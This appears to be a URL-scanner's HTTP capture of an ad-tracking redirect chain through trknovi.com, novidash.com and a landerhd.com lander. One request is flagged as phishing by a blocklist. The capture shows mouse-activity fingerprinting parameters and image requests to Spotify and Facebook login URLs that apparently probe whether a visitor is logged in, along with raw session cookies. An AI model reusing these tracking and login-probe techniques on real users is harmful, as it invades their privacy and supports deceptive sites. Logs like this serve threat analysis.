'nonce-wx/ftw8NmaADIGeezyuy' 'nonce-xUWjYSpFoV9cfYYTZoDu'
referrer-policy: strict-origin-when-cross-origin
set-cookie: gvc=MjIwOTgxNjYxNTU4MzAyNTEzMDk2NDMxMzQ3MTg1ODgyNDI4MTAz; expires=Thu, 02 Sep 2027 02:55:15 GMT; HttpOnly; Path=/; SameSite=None; Secure t=1TVcgdwXpUzdvwcf8eJkJc8M; Domain=dropbox.com; expires=Tue, 02 Sep 2025 02:55:15 GMT; HttpOnly; Path=/; SameSite=None; Secure __Host-js_csrf=1TVcgdwXpUzdvwcf8eJkJc8M; expires=Tue, 02 Sep 2025 02:55:15 GMT; Path=/; SameSite=None; Secure __Host-ss=eRTDFjhixc; expires=Tue, 02 Sep 2025 02:55:15 GMT; HttpOnly; Path=/; SameSite=Strict; Secure locale=en; Domain=dropbox.com; expires=Thu, 02 Sep 2027 02:55:15 GMT; Path=/; SameSite=None; Secure
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-server-response-time: 204
x-xss-protection: 1; mode=block
date: Sat, 03 Sep 2022 02:55:15 GMT
server: envoy
strict-transport-security: max-age=31536000; includeSubDomains
content-encoding: gzip
vary: Accept-Encoding
x-dropbox-response-origin: far_remote
x-dropbox-request-id: ab1f7a9a6fee4760a3cfa2e840dbec0d
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   34226
Md5:    749aa08de039477d0704d1f61d0b3838
Sha1:   ad2c76e66d0cab71c964fdb9f1370e5bb9b821a8
Sha256: e7879cf63db6dfb091ab92f494af2caab78cc7a98e21955303b711b39e8d8b43
                                        
                                            GET /smartlink-css/6312c212994913464d155879?sop=3&mouse_movements=0&mouse_distance=0&mouse_clicks=0&mouse_active=0&mouse_speed=0 HTTP/1.1 
Host: novidash.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:18 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6ImRQN2NwRW9FMGkxbGFyTVBDMTBNUFE9PSIsInZhbHVlIjoid3NwMXhMR3BIUGJxUGJZQUxqUDJMdEZmOVZyOC9xQW04YlhRbG9yMi9vOEFUL3F6cW03dHE4SXU5c3o3WmN4bEVLYUFFYkNTL1FlWTBYWThVRkl4WTkrNEFJWktMQWtUR2d0Nm9qMU5tNWNWU045U3hRcjRWd3VJMGlhYnBhYTIiLCJtYWMiOiI0NmI1MDA1MGU1ODVhMjFkNWU5NjIyY2RiNWNiMWY1NTgwNDJkOTI2NzgzYjJlYjZiOGUzOWE5Y2VkMDc0NTZiIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:18 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IlNMSFUxcEtYME51blAwRmJVM1J6QUE9PSIsInZhbHVlIjoiS3pDUm1Gd3pMVnFiVXdqbXZ0ckhydmg1VXJzNytieXMwMURlMENET1lxUGhCUEFCOE1XUFdLaHpqdmJtWjVWajViNmhnRmg2ZzF3ZFdwTldUbm1halZBL2MrZHVwRlBkY0xDUVNycmRqNUZBK29WcWYzdXUwaEtXN3pvNnN6YloiLCJtYWMiOiIyNDhiZjA4NDk1ZDQ0NWE4ODA4ZTMwN2Y0YWFlZDYzMzdiMTI2N2VmMzg4OGYyYTcxN2U0ZTVkZWIyMjg2YjAwIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:18 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
                                            GET /smartlink-css/6312c212994913464d155879 HTTP/1.1 
Host: 0ee06.trknovi.com
                                        
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://0ee06.trknovi.com/smartlink?track=eyJ1c2VyX2lkIjoxMzc5LCJjcmVhdGl2ZV9pZCI6IjI5MDcyMCIsImxhbmRlcl9pZCI6IjEyNSJ9&click_id=wumnpcku2gu4m2pii7rf3oas&subid=9dd1b15d-f028-4d41-b731-bec13c85ae61
Cookie: XSRF-TOKEN=eyJpdiI6InRzblNVVWV0cFBURlA5MVJBL1ZBTXc9PSIsInZhbHVlIjoiVWF3cnYyVlBmVEcyMTdzZmhhcHlxM1dyOW1IdWdqNjZady9QZDAwcmN4TnlxbnZpY2tobk0vNlJrQlZ4TWJYaVFZUTZyR05WOXhMekxCM0JjS3dFUkhRMHZ0SGtyT3hwWnBPcHpveTNTMjFQdkJnUUNVK1dMUDNDNVlCS21uWGgiLCJtYWMiOiI0NDBjNGJiMzQxYTc1MTFmYjdmZDY0NmFjZWZmNTM3NmExM2EyOTBjZjA5OTJiZDMxZmFiNTI5NGNiNDgwZGYyIiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6ImlCOHRGMzBwanM0UDlmSGcvSEdkTlE9PSIsInZhbHVlIjoiSHNjRDkwZ2EwcDFmdXA3cEdxNGRiQVVJajFNdy9vcTZSRWcxLzg2NWtSc3EyT0VHdkxUeUFKVERSY0wrVE5vbkt1OXZnSG5PN3oxcEpIejFGQWkzZUNIZzZiK3piT1VpS3laVmhGV3hxejh4b0UwUnAzcEUzZ01LNkxhZHVBVjYiLCJtYWMiOiJmMDZlYTM5OWYzNjE2NmJiM2UzZDE0MzQ2ZmI3YjFlNDI0ZWZhNzJjYzEzNDNmNTk0YjMzNjk5YzAzZmIxYjg4IiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

                                         
                                         188.240.52.20
HTTP/2 200 OK
content-type: text/css; charset=UTF-8
                                        
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:14 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IjVNYzlFVTRYMGZsa3F4WmFUeisvb1E9PSIsInZhbHVlIjoibklyWU5nckxXVmFCUUhPMjV5YjAzZXJmYjFicGt4d1NHZk5kRElGNVBGWXRRYlVqSktrWjlGL0daL3FQWFFnYUpzdzdpMGEvdGZVUElJbGVxU09WTGtkbXVQWmV1UVFKVEJ3MWEyZjRuUlJnZy96RTZMbmprNkFnbDQyR3hHM2MiLCJtYWMiOiJkYTliYjQwNjYxMjY4NGY1YzcyMWY4MTcxYmNiNjMzZDRiODM5NTA4YmJjYmZmZGZiNjBjZjk4OGQ2NWJjMjIxIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IjlpTU1oYWJKejR5WUJBclBYanNvenc9PSIsInZhbHVlIjoiRGRZL1pSQVk0cGk5TkdGaFJ0SzF1MXdTcFhlY0NaMjUwMDVpSm8zSlFRd25kaDlqakRIZzQxREdwcjBjTFAvR1g4Z0dpQ2krdnFkKy9CTE01cmltQkJEVUtnZGFkMVdYUE1KN1FSbFhhdTZIOU9CelIyMWdzeVJtbDFyNDhCSmoiLCJtYWMiOiI1OGU3NmI2NjM4MzNhNTE0ZDBhODI4MzhjZWFjOWM3NDU0Y2I0NzZkOTQ1ZDc4MTgzYjE2ZWJjOWFmMmUwMGNlIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /smartlink?mongo_id=6312c212994913464d155879&mongo_grouped_id=6312bf94d058792a2663b3b7&redirect_url=https%3A%2F%2Fother.landerhd.com%2F899637196&fingerprint=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&js=1 HTTP/1.1
Host: 0ee06.trknovi.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Cookie: XSRF-TOKEN=eyJpdiI6IjVNYzlFVTRYMGZsa3F4WmFUeisvb1E9PSIsInZhbHVlIjoibklyWU5nckxXVmFCUUhPMjV5YjAzZXJmYjFicGt4d1NHZk5kRElGNVBGWXRRYlVqSktrWjlGL0daL3FQWFFnYUpzdzdpMGEvdGZVUElJbGVxU09WTGtkbXVQWmV1UVFKVEJ3MWEyZjRuUlJnZy96RTZMbmprNkFnbDQyR3hHM2MiLCJtYWMiOiJkYTliYjQwNjYxMjY4NGY1YzcyMWY4MTcxYmNiNjMzZDRiODM5NTA4YmJjYmZmZGZiNjBjZjk4OGQ2NWJjMjIxIiwidGFnIjoiIn0%3D; novidash_session=eyJpdiI6IjlpTU1oYWJKejR5WUJBclBYanNvenc9PSIsInZhbHVlIjoiRGRZL1pSQVk0cGk5TkdGaFJ0SzF1MXdTcFhlY0NaMjUwMDVpSm8zSlFRd25kaDlqakRIZzQxREdwcjBjTFAvR1g4Z0dpQ2krdnFkKy9CTE01cmltQkJEVUtnZGFkMVdYUE1KN1FSbFhhdTZIOU9CelIyMWdzeVJtbDFyNDhCSmoiLCJtYWMiOiI1OGU3NmI2NjM4MzNhNTE0ZDBhODI4MzhjZWFjOWM3NDU0Y2I0NzZkOTQ1ZDc4MTgzYjE2ZWJjOWFmMmUwMGNlIiwidGFnIjoiIn0%3D
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
TE: trailers

                                         
188.240.52.20
HTTP/2 302 Found
content-type: text/html; charset=UTF-8
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:14 GMT
location: https://other.landerhd.com/899637196
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
set-cookie: XSRF-TOKEN=eyJpdiI6Im00VStUdjhCeDdZelRWRDU0VHd0ZGc9PSIsInZhbHVlIjoiNXR0SndoTUZubC9zeE0xckY4SVFYaU1mbjBLUitBS20xOEt0cXhpbnlZcWVZejVyNkJRWW5EcXhpdC8zc1lRcVlKcUd4QmM1WUJSVWwvcWU0Rk41NC95VnBRNFlyY2FpVWdpa2RwRDZ5VWgzam5tYkY2UUM0Sm1zUXdPN3IyYVMiLCJtYWMiOiIzODgxZjg2ZjU0NjBmZGUwMTA1ZDY2MDllNzA3OGIwYTczYTNhNDAwNjc2YWZkODFkN2M2NGUxNWM1NmVmMGNmIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6Iks3SFZ3bVFoa2hydkpJenU0anBjanc9PSIsInZhbHVlIjoiN3g4UmNoOTk5U2lSaUtrN1d5QzdtMnRiR01obG9wdHd1OHhmNFRZWjc1RDV4VCtRZHREMDFLSlM3UlBvWXA5RmdRKzJyQ3ZKZk5kL01MUDY2UjlDellUWk8rYzg0Z3YrQnFXWUNnek5RVUErdk85SjdBdDVIaGRNSENlSUZjeWoiLCJtYWMiOiI2NzE1NjI3Y2ExZjAwNzU0M2Y2ZTRjNWIxY2Q5YjNlNjY0Mjc5MDllMGRkMGNhZDE1NTRmN2YyNGQ2MmRhOGNlIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:14 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /de/login/?forward_url=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico HTTP/1.1
Host: www.spotify.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
35.186.224.25
HTTP/2 302 Found
date: Sat, 03 Sep 2022 02:55:15 GMT
x-powered-by: Express
set-cookie: sp_usid=af354575-f3ec-456d-b6d5-58331f3b1b4f; Max-Age=1800; Domain=spotify.com; Path=/; Secure sp_m=de; Path=/; Domain=.spotify.com; Max-Age=115516800; Expires=Sat, 02 May 2026 02:55:15 GMT; Secure; HttpOnly; SameSite=Lax sp_t=cd187d17-be84-4747-8e1e-765bd04fae6d; Path=/; Domain=.spotify.com; Max-Age=31536000; Expires=Sun, 03 Sep 2023 02:55:15 GMT; Secure sp_new=1; Path=/; Domain=.spotify.com; Max-Age=86400; Expires=Sun, 04 Sep 2022 02:55:15 GMT; Secure sp_landing=https%3A%2F%2Fwww.spotify.com%2Fde%2Flogin%2F; Path=/; Domain=.spotify.com; Max-Age=86400; Expires=Sun, 04 Sep 2022 02:55:15 GMT; Secure; HttpOnly
location: https://accounts.spotify.com/login?continue=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico&_locale=de-DE
content-security-policy: base-uri 'none'; connect-src https: wss:; form-action https:; frame-ancestors 'self' https://*.spotify.com https://*.spotify.net; object-src 'none'
x-join-the-band: https://www.spotify.com/jobs/
sp-trace-id: 632cbd3d0252ec19
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
content-encoding: gzip
vary: Accept-Encoding
server: envoy
via: HTTP/2 edgeproxy, 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /login?continue=https%3A%2F%2Fwww.spotify.com%2Ffavicon.ico&_locale=de-DE HTTP/1.1
Host: accounts.spotify.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
35.186.224.25
HTTP/2 200 OK
content-type: text/html;charset=utf-8
date: Sat, 03 Sep 2022 02:55:15 GMT
vary: Accept-Encoding
x-ua-compatible: IE=edge
cache-control: no-cache, no-store, must-revalidate
pragma: no-cache
x-frame-options: deny
set-cookie: __Host-device_id=AQCQpqToQFMjbO2UsShKMSYwNj7Mum9BWAejnKlcW882ruYIBDxnAXJa-y_KUl2e1qiRZTvXyNuZ0cUC2O-eDAUSFClG8cSuPQ0;Version=1;Path=/;Max-Age=2147483647;Secure;HttpOnly;SameSite=Lax __Secure-TPASESSION=AQBTuUdbDdt2uDvPrj0gfn7kR32Jeubjuc8xQ1H65V8BXtSLfxHSQkU1LfKXfJdcEKKc27dNuvC8YE/2vUFUJiWLrCmk2Z/XzLw=;Version=1;Domain=accounts.spotify.com;Path=/;Secure;HttpOnly;SameSite=None sp_sso_csrf_token=013acda719309b397e7ca091c28a672e646e2bf8af31363632313733373135343232;Version=1;Domain=accounts.spotify.com;Path=/;Secure;SameSite=Lax sp_tr=false;Version=1;Domain=accounts.spotify.com;Path=/;Secure;SameSite=Lax __Host-sp_csrf_sid=78ccf50e188853056911a25c5abf8f3b3d88e72d4b21d94fab6c48655176aa55; Path=/; HttpOnly; Secure; Expires=2022-09-3 03:55:15.422; Max-Age=3600; SameSite=Lax
content-security-policy: default-src 'self'; script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://www.google.com https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ https://cdn.cookielaw.org/scripttemplates/ https://*.onetrust.com https://accounts.scdn.co; img-src 'self' https://i.imgur.com https://d2mv8tnci56s9d.cloudfront.net https://profile-images.scdn.co https://*.scdn.co https://graph.facebook.com https://fbcdn-profile-a.akamaihd.net https://*.fbcdn.net https://platform-lookaside.fbsbx.com https://www.google.com https://www.google-analytics.com https://stats.g.doubleclick.net data: https://accounts.scdn.co; font-src 'self' data: https://sp-bootstrap.global.ssl.fastly.net https://fonts.gstatic.com https://*.scdn.co; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/css2; frame-src 'self' https://www.spotify.com https://www.google.com https://app.adjust.com https://itunes.apple.com itms-apps: https://www.google.com/recaptcha/; connect-src 'self' https://*.spotify.com https://www.google-analytics.com https://*.ingest.sentry.io/;
x-content-security-policy: default-src 'self'; script-src 'self' https://www.google-analytics.com https://ssl.google-analytics.com https://www.google.com https://www.gstatic.com/recaptcha/ https://www.google.com/recaptcha/ https://cdn.cookielaw.org/scripttemplates/ https://*.onetrust.com https://accounts.scdn.co; img-src 'self' https://i.imgur.com https://d2mv8tnci56s9d.cloudfront.net https://profile-images.scdn.co https://*.scdn.co https://graph.facebook.com https://fbcdn-profile-a.akamaihd.net https://*.fbcdn.net https://platform-lookaside.fbsbx.com https://www.google.com https://www.google-analytics.com https://stats.g.doubleclick.net data: https://accounts.scdn.co; font-src 'self' data: https://sp-bootstrap.global.ssl.fastly.net https://fonts.gstatic.com https://*.scdn.co; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com/css2; frame-src 'self' https://www.spotify.com https://www.google.com https://app.adjust.com https://itunes.apple.com itms-apps: https://www.google.com/recaptcha/; connect-src 'self' https://*.spotify.com https://www.google-analytics.com https://*.ingest.sentry.io/;
sp-trace-id: a7099648cd366c5a
content-encoding: gzip
strict-transport-security: max-age=31536000
x-content-type-options: nosniff
server: envoy
via: HTTP/2 edgeproxy, 1.1 google
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /releases/v5.7.2/css/all.css HTTP/1.1
Host: use.fontawesome.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site

                                         
172.67.169.247
HTTP/2 200 OK
content-type: text/css
date: Sat, 03 Sep 2022 02:55:15 GMT
x-amz-id-2: 5NP8+xqRh1FzZXuC3zm1osHKfH9eWYVU3hULOnty9foAbYVoWS+RrTgF3GpHTQPZ4zo7NrfhwaQ=
x-amz-request-id: FGM1ZV7T0WW9J2JQ
access-control-allow-origin: *
access-control-allow-methods: GET
access-control-max-age: 3000
vary: Origin, Access-Control-Request-Headers, Access-Control-Request-Method, Accept-Encoding
last-modified: Wed, 30 Jun 2021 15:45:57 GMT
etag: W/"7b1d7f457d056ace7b230b587b9f3753"
cache-control: max-age=31556926
cf-cache-status: HIT
age: 2113406
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=NsrYouuc7sI%2FT6SW7GPRg3gqU2C%2FZcqw9GJhgEfCt9rV4uKE7uqWXRIBI%2Bv1UMCJa04PIzgDKK4%2FIbdfcVoRR1jsJ9wprLWpfLLflyEI6vb%2BvTV0F9h0rD8SVAyZTblVDurOwM1C"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 744b3496fb621bfa-OSL
content-encoding: br
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /smartlink-css/6312c212994913464d155879?sop=1&mouse_movements=0&mouse_distance=0&mouse_clicks=0&mouse_active=0&mouse_speed=0 HTTP/1.1
Host: novidash.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:16 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6InczcTYvVTlkZGZvQ3VwaC9xNXdobmc9PSIsInZhbHVlIjoiWEZSWlFSVmpWdTdPRk9mV2xCWnRDWEYybXhjbTlRRW9XNE95azJYR0ZML2ZmZkg4Vyt0V21RbCtYb2tDbXlnZytJS1pBVnU0MmdOS2RRald0ZjBsemtDaUMwYWtsZk9VcGFQSEZCRkJIcnE2bk5zeUtaM3RzMzVxRnF2bWFZcDYiLCJtYWMiOiIxM2I5ZTc3NDBmNjYyMTFlNjhjYWQwZjNjNGRhM2Q3NmQyODZlYWFiNjBlZjEyNTNlOTAwZmFhM2QyOTY0NGIzIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:16 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6IlRFS09nbit1VnFYa3A4d3lrSmNKcVE9PSIsInZhbHVlIjoiRnNNdW54bzJVb21ndjFzUW5ZRmgzbitSS215SE16SjQ0QmVwMEQwYngzS0FFaSs5bGYxaHdHRXRnMHdmMm9INzNGTjlrWGtjSnJYN3pORms3YTFmbW1HQ3k5aDFsYUozT3JPVkZqdmwzaGtETVo1S0l6WWF2R1JONzAwc0JndTYiLCJtYWMiOiJmMGMxYTM3NmEzNjVmZWQ2ZWNhYWZkZTUzMThmNjI2NGY3NTcyMWRiYjNiNmY2M2UzYjc1OTcxMmJhNGYzMDY5IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:16 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
POST /smartlink-css/6312c212994913464d155879 HTTP/1.1
Host: novidash.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-type: application/x-www-form-urlencoded
Content-Length: 352
Origin: https://other.landerhd.com
Connection: keep-alive
Referer: https://other.landerhd.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

                                         
188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx/1.19.10
date: Sat, 03 Sep 2022 02:55:15 GMT
cache-control: private, must-revalidate
pragma: no-cache
expires: -1
access-control-allow-origin: *
set-cookie: XSRF-TOKEN=eyJpdiI6IkRUd3lENitwMFNFb2ZvMEdwNnhzL3c9PSIsInZhbHVlIjoiT1FOcXEwVklRMzVxMEpiaElRa0VoOWE2ZlVsanlvMmFVMGk0bG43MUtpYnk2bUpKMmtidktnalN0NCs5aUlGVFp6MndxZ3JJbTFmR043NG44UVl6OTN5Nk1oQWZuOFlEZ29OZkpxUU5PclBsS2FqYzVYckNxeDhtREJJaVJGNVUiLCJtYWMiOiI5OTgxNGFlZDEzNmJhMTA0YTBlMDg3NWJhMTFmNTdiZTdkNThiZTA0ZWI4ZTkwMzg3NGU2ZjZjOWFjYzAyZDA3IiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; samesite=lax novidash_session=eyJpdiI6ImNZQ1FpMFdxOWlmTTVNVUQraGRSTkE9PSIsInZhbHVlIjoiVzBpWkMvUlFBN0tFZ1B4RlRlTWNpenRFTVYrWHNMTXp3WW9tdnVMdHVqelJWQmpndmlYdzRJUmVpdDFnMlZab1Byb1FJazlFejRpc2xFL1ZhcUZQQmZNWlFEMGEwa01LL1llSUdQYk50Q3NGTVJjUEVpU1ZiS0RlSTMvMmJCMnoiLCJtYWMiOiI2ODU0NjdlNGM4ZmE4ZGNjODVlNGRkYmM0NzM4YmJmY2MwY2NhMzg0OWM1MTM3ZDExMjFiOTYwNDYyNWQwNTdmIiwidGFnIjoiIn0%3D; expires=Sat, 03-Sep-2022 04:55:15 GMT; Max-Age=7200; path=/; httponly; samesite=lax
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
strict-transport-security: max-age=31536000
X-Firefox-Spdy: h2


--- Additional Info ---

Alerts:
  Blocklists:
    - fortinet: Phishing
                                        
GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Ffavicon.ico%3F_rdr%3Dp HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

                                         
31.13.72.36
HTTP/2 200 OK
content-type: text/html; charset="utf-8"
content-encoding: br
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
content-security-policy-report-only: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com 'unsafe-eval' *.fbcdn.net;script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
x-frame-options: DENY
x-content-type-options: nosniff
x-xss-protection: 0
cross-origin-opener-policy: same-origin-allow-popups
vary: Sec-Fetch-Site, Sec-Fetch-Mode, Accept-Encoding
strict-transport-security: max-age=15552000; preload
x-fb-debug: hlJ2VuJj6XENaQC4d2skGs7Q+avVUvdiDa0hI46CSJQ64CheVWz5/jGyOlVUMBcVqFnBjWl/IMWTTyLuWDMhUQ==
date: Sat, 03 Sep 2022 02:55:15 GMT
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2


--- Additional Info ---
                                        
GET /smartlink?track=eyJ1c2VyX2lkIjoxMzc5LCJjcmVhdGl2ZV9pZCI6IjI5MDcyMCIsImxhbmRlcl9pZCI6IjEyNSJ9&click_id=wumnpcku2gu4m2pii7rf3oas&subid=9dd1b15d-f028-4d41-b731-bec13c85ae61 HTTP/1.1
Host: 0ee06.trknovi.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1

                                         
188.240.52.20
HTTP/2 200 OK
content-type: text/html; charset=UTF-8
server: nginx/1.19.10
